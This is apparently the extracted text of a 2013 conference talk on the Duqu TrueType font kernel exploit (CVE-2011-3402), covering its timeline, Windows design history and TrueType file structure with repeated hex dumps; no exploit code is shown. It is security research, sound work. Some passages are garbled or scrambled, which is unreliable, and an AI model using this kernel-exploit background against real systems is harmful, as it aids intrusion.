Note:
Because Type 1 font programs were originally
produced and were carefully checked only
within Adobe Systems, Type 1 BuildChar was
designed with the expectation that only errorfree Type 1 font programs would be presented
to it. Consequently, Type 1 BuildChar does
not protect itself against data inconsistencies
and other problems.
- Adobe Systems Incorporated 1993,
Adobe type 1 font format, Third printing
Version 1.1, Addison-Wesley Publishing
Company, Inc., Reading, Massachusetts, p. 8.
Friday, March 8, 2013
CVE-2011-3402
Windows Kernel TrueType Font Engine Vulnerability
(MS11-087)
March 8, 2013
CanSecWest
Julia Wolf
FireEye, inc.
Friday, March 8, 2013
Timeline
Friday, March 8, 2013
• May 2011: Earliest confirmed use of this exploit,
as discovered by Kaspersky. (Unconfirmed
possibilities of 2010 or 2005 for earliest use.)
• Aug-Oct 2011: CrySyS discovers “Duqu” and
partners with Symantec. Kaspersky Labs publishes
a ton of research too.
• Nov 2011: Microsoft names this “MS11-087”
• Nov 2011: Details of exploit briefly appear on a
Chinese web site.
Friday, March 8, 2013
• Dec 2011: Microsoft releases fix for vulnerability.
• Jun 2012: BlackHole developer begins to test this
exploit. It didn’t work, so no one really noticed.
• Oct 2012: Cool Exploit Kit, and almost
simultaneously BlackHole begin using a fully
working exploit.
• Currently: At least half a dozen exploit kits are
using the exact same exploit code. (Only one has
even changed the name.)
Friday, March 8, 2013
W32.Duqu: The precursor to the next Stuxnet
https://www.symantec.com/content/en/us/enterprise/
media/security_response/whitepapers/
Finally, the infostealer appears to have been first created along the same timeframe, in June 2011. The most rew32_duqu_the_precursor_to_the_next_stuxnet.pdf
cent variant was created on October 17, prior to the server being shutdown. Two of the additional DLLs pushed
Response
from the C&C were compiled hours before this sample.
Note that the recovered Stuxnet files date between June 2009 and March 2010 and therefore date prior to the
first development of these variants.
W32.Duqu
hnical Analysis
nstallation
The precursor to the next Stuxnet
Version 1.3 (November 1, 2011)
In one case, Duqu arrived at the target using a specially crafted, Microsoft Word document. The Word document
Contents
Executive
contained
a currently undisclosed 0-day kernel exploit
that allows summary
the attackers to install Duqu onto the comExecutive summary............................................ 1
puterInfection
unbeknownst
to the user.
On October 14, 2011, we were alerted to a sample by the Laboratory
Statistics............................................. 3
of Cryptography and System Security (CrySyS) at Budapest UniversiGeographic distribution ............................... 3
ty ofand
Technology
and
appeared
very similar
to
The full installation
process for Duqu is quite4 involved
lengthy.
ToEconomics.
illustrateThe
thethreat
installation
process
as simply
File history....................................................
theshellcode
Stuxnet worm
of 2010. CrySyS named the threat Duqu
as possible
it can
be ..............................................
divided into 2 parts: the5 exploit
andfrom
the June
installer.
Technical
Analysis
[dyü-kyü] because it creates files with the file name prefix “~DQ”.
Installation .................................................. 5
The research lab provided their detailed initial report to us, which
Installed component architecture ............... 6
we have added as an appendix. The threat was recovered by CryLoad point (JMINET7.SYS) ........................... 7
SyS from an organization based in Europe and has since been found
Main DLL (NETP191.PNF)
............................
8
The vulnerability
details are currently
undisclosed
due
to the current
unavailability
of a patch.
Future
versions
of
in
numerous
countries.
We
have
confirmed
W32.Duqu
is
a
threat
Payload
loader (Resource
302)....................
9 vulnerability.
this paper
will include
the details
related to the
nearly identical to Stuxnet, but with a completely different purpose.
Payload (.zdata DLL) .................................. 12
Downloaded
threats...................................
15
is essentially
the precursor
to akernel
future mode
Stuxnet-like
attack. which
The
When the
Word document
is opened, the exploit
is Duqu
triggered.
The exploit
contains
shellcode,
Replication ..................................................17
threatby
was
written for
by the
same
authors,
or HKEY_LOCAL_MACHINE\
those that have access to
will first
check
if
the
computer
is
already
compromised
looking
the
registry
value
Variants ............................................................ 18
the Stuxnet source code, and the recovered samples have been creSOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\4\”CFID”. If the computer has already
CMI4432.SYS ............................................. 18
ated after the last-discovered version of Stuxnet. Duqu’s purpose
CMI4432.PNF
.............................................
Friday,
8,
2013
beenMarch
compromsed,
the
shellcode gracefully18
exits. is to gather intelligence data and assets from entities such as indus-
Exploit shellcode
W32.Duqu
• Stuxnet’s cousin’s hairdresser’s former
roommate... or something like that.
• For more information:
http://www.google.com/search?q=duqu
• Initial vector was an Office Document
emailed to victim(s), containing an
embedded TTF, which exploited an 0-day in
the Windows Kernel... because...
because...
Friday, March 8, 2013
WIN32K.SYS
• Windows NT executes TrueType font programs...
• For rendering bitmaps...
• ... in Ring 0
• Yes, this is insane as it sounds.
But it gets even better...
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
This change as implemented in Windows
NT 4.0 results in faster operation and
reduced memory requirements, both
visible benefits to the end user. And there
is no loss of reliability, since (a) the kernel
mode implementations of Win32 are fully
protected from direct access by
applications;
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
Security
Due to the modular design of Windows NT
moving Window Manager and GDI to kernel
mode will make no difference to the security
subsystem or to the overall security of the
operating system this will also have no effect on
the C2 or E3 security certification evaluation,
other than making it easier to document the
internal architecture of Windows NT.
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
In the Windows NT Workstation 4.0
release, the Window Manager and GDI
processes are still protected because
applications cannot write to memory
locations occupied by kernel mode
code and data, as is shown above.
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
Consequently, there is no change in
stability or reliability resulting from
poorly behaved applications, because
kernel-mode code and data is
protected by the Windows NT
architecture and the processor's
memory protection system.
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
Note that in this respect of total isolation
of critical operating system data from
user-mode application code, Windows NT
Workstation 4.0 remains unchanged in
being architecturally more robust than
other PC-based operating systems, such as
Microsoft Windows 95, IBM OS/2 Warp,
and Apple Macintosh operating systems.
Friday, March 8, 2013
http://technet.microsoft.com/en-us/
library/cc750820.aspx
All of those systems make a trade-off for
greater performance and smaller memory
footprint that involves [...] That tradeoff is
entirely appropriate for today's low- and
medium-range platforms, but not in a high-end
platform such as Windows NT.
With Windows NT 4.0, it remains true that if
application code can crash the system, Windows
NT has a bug, period.
Friday, March 8, 2013
So, About Those
Exploits...
Friday, March 8, 2013
Phylogenetic Tree
The May 2011
Duqu Version
The Aug 2011
MAPP Version
The ??? 201?
BHEK Version
The Jun 2012
64bit Version
Friday, March 8, 2013
Renamed to
“abcdef” Ver
Phylogenetic Tree
• Metadata is constant
• Font tables are constant
• Jokes are constant
• The (32bit) font program is constant.
Except in the most recent exploit kit
versions.
• (The first few bytes are NULLed out. It
doesn’t effect execution, and may be an
accident.)
Friday, March 8, 2013
Phylogenetic Tree
• The only major change has been the x86 shellcode.
Completely different between versions.
• Oh, and there is that 64-bit version....
• I can’t find evidence of its existance prior to Jun 2012
• Appears to have been derived from the 32-bit version.
• Major changes: Offset to CVT overwrite, and the font
program.
Friday, March 8, 2013
TrueType
Font File Format
Friday, March 8, 2013
History
• The Earth Cools
• Bitmap Fonts
• Postscript Type 1, 2, 3, ..., 42
(cubic Bézier curves)
• TrueType
(quadratic Bézier curves)
• OpenType... more of the same kind of thing
Friday, March 8, 2013
Cubic Bézier Curve
Friday, March 8, 2013
Friday, March 8, 2013
Friday, March 8, 2013
Rasterization Problems
Friday, March 8, 2013
Rasterization Problems
Friday, March 8, 2013
Rasterization Problems
Friday, March 8, 2013
SIGNAL PROCESSING
You’re doing it wrong.
Friday, March 8, 2013
Rasterization Solutions
Friday, March 8, 2013
Control Value Table
&UHDWLQJWKHFRQWUROYDOXHWDEOH
7KHXSSHUFDVH+KDVIHDWXUHVLQFRPPRQZLWKRWKHUXSSHUFDVHVWUDLJKWJO\SKVLQWKLVIRQW7KHQHHG
WRFRRUGLQDWHNH\GLPHQVLRQVLQWKLVJO\SKZLWKNH\GLPHQVLRQVLQRWKHUUHODWHGJO\SKVVXJJHVWVWKH
QHHGIRUDQXPEHURIFRQWUROYDOXHWDEOHHQWULHV
7KHFRQWUROYDOXHWDEOHHQWU\IRUWKHFDSKHLJKWRIWKH+LVGHULYHGIURPDQDQDO\VLVRIWKHKHLJKWVRI
UHODWHGOHWWHUVLQWKHIRQW$VVKRZQLQ7DEOHEHORZHQWU\KDVWKHYDOXH([DPLQLQJWKHIRQW
GDWDVKRZVWKDWWKLVLVLQGHHGWKHKHLJKWRIWKH+,WLVDOVRWKHKHLJKWRIUHODWHGJO\SKVVXFKDVWKH,
.DQGWKH/
7RFUHDWHFRQWUROYDOXHWDEOHHQWU\WKHXSSHUFDVHVWHPZLGWKLWLVQHFHVVDU\WRORRNDWWKHZLGWKV
RIWKHVWHPVLQNH\JO\SKVDFURVVWKHIRQWDQGILQGDYDOXHWKDWLVDFFHSWDEOHIRUDOO2QHSRVVLEOH
DSSURDFKLVWRDYHUDJHWKHUHODWHGYDOXHV
2QFHWKHYDOXHLVGHWHUPLQHGWKHQHFHVVDU\FRQWUROYDOXHWDEOHHQWU\VKRXOGEHHQWHUHGLQWKHFRQWURO
YDOXHWDEOH
$VWKHJHRPHWULFDQDO\VLVVXJJHVWVDQGWKHLQVWUXFWLRQVWKDWIROORZZLOOUHYHDOWKHLQVWUXFWLRQRIWKH+
ZLOOUHTXLUHVHYHUDOFRQWUROYDOXHWDEOHHQWULHV7KH\DUHVKRZQLQ7DEOH
7DEOH&RQWUROYDOXHWDEOHIRU1HZ<RUN
(QWU\
Friday, March 8, 2013
9DOXH
'HVFULSWLRQ
FDSKHLJKW
EDVHOLQH
KHLJKWRIVHULI
ZLGWKRIVHULI
XSSHUFDVHVWHPZLGWK
OHIWVLGHEHDULQJ
XSSHUFDVHVWURNH
EODFNERG\ZLGWKRIXSSHUFDVH+
$/,*153>@
$OLJQSRLQWZLWKUSSRLQW
Just Go Read Apple’s
Reference Manual...
7KHQH[WLQVWUXFWLRQFRQWUROVWKHOHQJWKRIWKHVHULIVRQLQVLGHOHIWVWHP7KH
VDPHDVLQWKHSUHYLRXVLQVWUXFWLRQIRUWKHRXWHUVHULI7KLVLVDFFRPSOLVKHGZ
386+%>@ SXVKWZRE\WHVRQWRWKHVWDFN
SRLQWQXPEHU
FRQWUROYDOXHWDEOHORFDWLRQ
0,53>@ 0RYHSRLQWXQWLOLWVGLVWDQFHLQWKH[
GLUHFWLRQIURPUSSRLQWLVWKHYDOXHLQ
FRQWUROYDOXHWDEOHHQWU\VHULIZLGWK
6HWUSWRUS
'RQRWFKDQJHUS
8VHWKHPLQLPXPGLVWDQFH
5RXQGDQGXVHWKHFXWLQ
7KLVLVDJUH\GLVWDQFH
6HWUSWRSRLQW
Friday, March 8, 2013
Like This...
Where the CVT
“cuts in”
Friday, March 8, 2013
Things To Know...
• Glyphs are represented as outlines, which
are then rasterized to the requested point
size
• Outlines are drawn using a Turing
Complete language to manipulate the
graphics state
• Also there’s optional support in TTF for
glyph bitmaps, in addition to these outlines
Friday, March 8, 2013
TrueType VM
Environment
• A stack used by VM operators to POP
arguments from, and PUSH results onto
• A “Storage Area” array of predefined size
• A “Control Value Table” of predefined size
(Used implicitly by certain VM operators)
• Global Graphics State
Friday, March 8, 2013
On-Disk Format
• Based upon QuickDraw GX spline font “sfnt”
format, which is sort of based upon the
MacOS Resource Fork format, but zillions of
other file formats basically do the same thing
• Offset-Length-Table
• Network (m68K) byte order
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00 45
28 45
78 45
94 4f
56 63
34 63
02 66
9b 67
bc 68
36 68
242 68
0e 6c
0e 6d
20 6e
7c 70
35 70
0d b8
1c 00
00 00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
The offset subtable (12 bytes)
00 01 00 00 Magic Number (Version)
00 10 Number of Tables (16 in this case)
These are for doing a log binary tree search
01 00 searchRange
00 04 entrySelector
00 00 rangeShift
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00 45
28 45
78 45
94 4f
56 63
34 63
02 66
9b 67
bc 68
36 68
242 68
0e 6c
0e 6d
20 6e
7c 70
35 70
0d b8
1c 00
00 00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
The offset subtable (12 bytes)
00 01 00 00 Magic Number (Version)
00 10 Number
of Tables
(16
this case)
“true” and
“typ1”
areinalso
These are for used
doingfor
a log
Macbinary
fonts, tree search
01 00 searchRange
0x00010000 is used for
Windows TTF fonts,
00 04 entrySelector
and in OTF officially defined
00 00 rangeShift
as “version 1.0”
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00 45
28 45
78 45
94 4f
56 63
34 63
02 66
9b 67
bc 68
36 68
242 68
0e 6c
0e 6d
20 6e
7c 70
35 70
0d b8
1c 00
00 00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
The offset subtable (12 bytes)
00 01 00 00 Magic Number (Version)
00 10 Number of Tables (16 in this case)
These are for doing a log binary tree search
01 00 searchRange
00 04 entrySelector
00 00 rangeShift
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00 45
28 45
78 45
94 4f
56 63
34 63
02 66
9b 67
bc 68
36 68
242 68
0e 6c
0e 6d
20 6e
7c 70
35 70
0d b8
1c 00
00 00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
The offset subtable (12 bytes)
00 01 00 00 Magic Number (Version)
00 10 Number of Tables (16 in this case)
These are for doing a log binary tree search
01 00 searchRange
00 04 entrySelector
00 00 rangeShift
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
16 table records
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
Friday, March 8, 2013
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
32
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
A Table Record (16 bytes)
45 42 44 54 Tag
(EBDT = “Embedded Bitmap DaTa”)
4b 90 43 d6 CheckSum
(All bytes added together, mod 2 )
00 03 bd 54 Offset
(245076 bytes from beginning of file)
00 00 00 28 Length (Table is 40 bytes long)
Friday, March 8, 2013
On-Disk Format
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
etc...
00
4b
1f
1e
03
00
00
7f
18
db
00
00
00
01
1c
9c
8b
01
00
01
90
4d
20
bd
61
00
06
d3
b2
16
82
5e
08
d0
11
9d
c0
00
00
43
32
05
0e
00
00
e9
69
28
00
00
00
00
3a
3e
ff
63
00
00
d6
14
0a
ca
57
00
00
4b
94
be
1e
00
23
db
69
81
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
3a
00
10
03
03
03
03
03
03
00
03
03
03
03
03
03
03
03
03
40
00
01
bd
bd
be
ba
ba
ba
01
ba
b9
b9
ba
ba
ba
bb
bd
ba
60
00
00
54
7c
f4
24
8c
d0
0c
e4
a8
e0
7c
d4
04
a0
1c
c0
b8
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
04
00
00
00
00
00
00
03
00
00
00
00
00
00
00
00
00
0c
00
00
00
01
00
00
00
00
b8
00
00
00
00
00
00
01
00
00
60
00
00
28
78
94
56
34
02
9b
bc
36
24
0e
0e
20
7c
35
0d
1c
00
45
45
45
4f
63
63
66
67
68
68
68
6c
6d
6e
70
70
b8
00
00
42
42
42
53
6d
76
70
6c
65
68
6d
6f
61
61
6f
72
7f
00
00
44
4c
53
2f
61
74
67
79
61
65
74
63
78
6d
73
65
c0
00
00
54
43
43
32
70
20
6d
66
64
61
78
61
70
65
74
70
b8
00
00
|............EBDT|
|K.C....T...(EBLC|
|.M2....|...xEBSC|
|. ..........OS/2|
|.......$...Vcmap|
|.a.W.......4cvt |
|............fpgm|
|............glyf|
|..iK........head|
|..(........6hhea|
|...........$hmtx|
|.......|....loca|
|.^..........maxp|
|...#....... name|
32
|..:........|post|
|..>i.......5prep|
|................|
|..c.:@`...`.....|
|................|
A Table Record (16 bytes)
